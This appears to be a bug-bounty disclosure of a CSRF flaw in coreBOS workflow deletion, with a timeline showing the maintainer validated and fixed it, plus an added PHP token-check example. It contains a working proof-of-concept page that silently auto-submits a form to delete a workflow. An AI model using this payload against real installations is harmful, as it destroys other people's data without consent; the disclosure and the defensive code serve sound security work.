Cross-Site Request Forgery (CSRF) in tsolucio/corebos

Valid

Reported on

Oct 18th 2021


Description

Hey Corebos team

An attacker is able to delete a workflow as there isn't any CSRF token for it.

//PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.corebos.com/index.php">
      <input type="hidden" name="module" value="com&#95;vtiger&#95;workflow" />
      <input type="hidden" name="action" value="deleteworkflow" />
      <input type="hidden" name="workflow&#95;id" value="27" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

After you open the PoC.html file, the workflow with id equal to 27 will be deleted.

We have contacted a member of the tsolucio/corebos team and are waiting to hear back 2 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. a month ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. a month ago
Joe Bordes validated this vulnerability a month ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joe Bordes confirmed that a fix has been merged on 40e22c a month ago
Joe Bordes has been awarded the fix bounty
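
A minimal server-side guard for the gap described in the report, written as an added example and not taken from coreBOS or from the fix commit: the function names, the `csrf_token` field name and the action list are assumptions. It refuses state-changing actions unless they arrive as POST with a per-session token in the request body, and runs three constructed requests through the check.

```php
<?php
// Added example, not coreBOS code. Function names, the 'csrf_token' field
// name and the action list below are hypothetical.

// Actions that change state and must never run on a bare GET.
const STATE_CHANGING_ACTIONS = ['deleteworkflow'];

// Create (once per session) and return the per-session anti-CSRF token.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Return true when the request may proceed.
// $query: URL parameters, $post: body parameters, $session: server-side session.
function csrf_check(string $method, array $query, array $post, array $session): bool
{
    $action = $post['action'] ?? $query['action'] ?? '';
    if (!in_array($action, STATE_CHANGING_ACTIONS, true)) {
        return true; // not a protected action
    }
    if (strtoupper($method) !== 'POST') {
        // The PoC form has no method attribute, so the browser sends a GET.
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    // Token must be a string from the body and match in constant time.
    return is_string($supplied) && $expected !== '' && hash_equals($expected, $supplied);
}

// Constructed sample requests (same parameters as the PoC form).
$session = [];
$token   = csrf_token($session);
$params  = ['module' => 'com_vtiger_workflow', 'action' => 'deleteworkflow', 'workflow_id' => '27'];

$cases = [
    'cross-site GET, no token'  => ['GET',  $params, []],
    'cross-site POST, no token' => ['POST', [], $params],
    'same-site POST with token' => ['POST', [], $params + ['csrf_token' => $token]],
];
foreach ($cases as $label => [$method, $query, $post]) {
    $verdict = csrf_check($method, $query, $post, $session) ? 'allowed' : 'rejected';
    echo $label, ': ', $verdict, PHP_EOL;
}
```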